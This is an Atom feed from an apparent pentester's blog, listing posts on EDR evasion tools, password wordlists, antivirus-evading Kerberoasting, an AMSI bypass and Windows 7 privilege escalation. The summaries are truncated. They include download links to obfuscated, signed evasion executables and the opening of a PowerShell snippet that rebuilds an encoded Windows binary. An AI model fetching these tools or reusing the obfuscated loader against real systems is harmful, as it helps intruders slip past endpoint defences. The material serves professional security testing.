<feed xmlns="http://www.w3.org/2005/Atom"> <id>https://sp00ks-git.github.io/</id><title>A Pentesters Ramblings</title><subtitle>A way to recall methodologies during engagements when a specific challenge or circumstance presents itself.</subtitle> <updated>2023-08-19T21:39:25+01:00</updated> <author> <name>sp00ks</name> <uri>https://sp00ks-git.github.io/</uri> </author><link rel="self" type="application/atom+xml" href="https://sp00ks-git.github.io/feed.xml"/><link rel="alternate" type="text/html" hreflang="en" href="https://sp00ks-git.github.io/"/> <generator uri="https://jekyllrb.com/" version="4.3.2">Jekyll</generator> <rights> © 2023 sp00ks </rights> <icon>/assets/img/favicons/favicon.ico</icon> <logo>/assets/img/favicons/favicon-96x96.png</logo> <entry><title>Evasion Tools</title><link href="https://sp00ks-git.github.io/posts/evasion-tools/" rel="alternate" type="text/html" title="Evasion Tools" /><published>2023-07-16T09:50:00+01:00</published> <updated>2023-08-19T21:38:24+01:00</updated> <id>https://sp00ks-git.github.io/posts/evasion-tools/</id> <content src="https://sp00ks-git.github.io/posts/evasion-tools/" /> <author> <name>sp00ks</name> </author> <category term="tools" /> <summary> A list of tools to bypass EDR using a variety of evasion techniques. PwnPowerShell GH - Signed - https://github.com/sp00ks-git/obfuscated-Encrypted-2023/raw/gh-pages/pjutvtn.exe.Signed.exe MU - Signed - https://mega.nz/file/e2gwGIJS#ivCiaYAmi_w_PZz5EPGrehJ2GPlUgEOY1kNphx0nkeQ GH - Un-Signed - https://github.com/sp00ks-git/obfuscated-Encrypted-2023/blob/gh-pages/InteractivePS-defender-c... 
</summary> </entry> <entry><title>Wordlists</title><link href="https://sp00ks-git.github.io/posts/wordlist/" rel="alternate" type="text/html" title="Wordlists" /><published>2023-07-15T21:35:00+01:00</published> <updated>2023-07-15T22:17:44+01:00</updated> <id>https://sp00ks-git.github.io/posts/wordlist/</id> <content src="https://sp00ks-git.github.io/posts/wordlist/" /> <author> <name>sp00ks</name> </author> <category term="tools" /> <summary> WORDLISTS Suggested Wordlists download links (HTTP) - working as of 14/10/2019 (maybe out of date now but some should still be working) rockyou - https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt (~14,300,000 words) rocktastic12a - http://www.mediafire.com/file/9tf3n2d45tgktq1/Rocktastic12a.7z/file (1.37GB - Compressed) dictionary_words - https://github.... </summary> </entry> <entry><title>Encrypted SPN Scanning</title><link href="https://sp00ks-git.github.io/posts/Encrypted-SPN-Scanning/" rel="alternate" type="text/html" title="Encrypted SPN Scanning" /><published>2023-03-20T21:00:00+00:00</published> <updated>2023-07-15T20:15:24+01:00</updated> <id>https://sp00ks-git.github.io/posts/Encrypted-SPN-Scanning/</id> <content src="https://sp00ks-git.github.io/posts/Encrypted-SPN-Scanning/" /> <author> <name>sp00ks</name> </author> <category term="techniques" /> <summary> Encrypted SPN Scanning and Cipher extraction whilst evading AntiVirus Usually SPN scanning involves using tools such as Rubeus. However as these are common and AV is looking for fingerprints of these tools and not just the type of traffic that is being requested (AS-REQ) in my experience this is a better option for Kerberoasting. The powershell script of choice was made by CyberArk over 7 yea... 
</summary> </entry> <entry><title>AMSI</title><link href="https://sp00ks-git.github.io/posts/amsi/" rel="alternate" type="text/html" title="AMSI" /><published>2022-06-25T21:42:00+01:00</published> <updated>2023-03-02T22:06:00+00:00</updated> <id>https://sp00ks-git.github.io/posts/amsi/</id> <content src="https://sp00ks-git.github.io/posts/amsi/" /> <author> <name>sp00ks</name> </author> <category term="techniques" /> <summary> A M S I ${01001011100110010} = [Convert]::FromBase64String("TV"+"qQAAM"+"AAAAEAAAA//8A"+"ALgAAAAAAAAAQAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPszD4AAAAAAAAAAAOAAIiALATAAAIwBAAAGAAAAAAAArqsBAAAgAAAAwAEAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAAAAAgAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEA... </summary> </entry> <entry><title>Win7 LPE</title><link href="https://sp00ks-git.github.io/posts/Win7-LPE/" rel="alternate" type="text/html" title="Win7 LPE" /><published>2021-10-31T13:10:00+00:00</published> <updated>2022-06-26T20:52:28+01:00</updated> <id>https://sp00ks-git.github.io/posts/Win7-LPE/</id> <content src="https://sp00ks-git.github.io/posts/Win7-LPE/" /> <author> <name>sp00ks</name> </author> <category term="techniques" /> <summary> It is less common than it used to be to find Windows 7 operating systems in place; however, they are still found across domains, sometimes for bespoke applications or services that can’t be ported onto up-to-date operating systems for ‘reasons’. I had this scenario on an engagement where I was in an office presented with a Windows 7 desktop. It was a black-box unauthenticated test and the idea was to s... </summary> </entry> </feed>
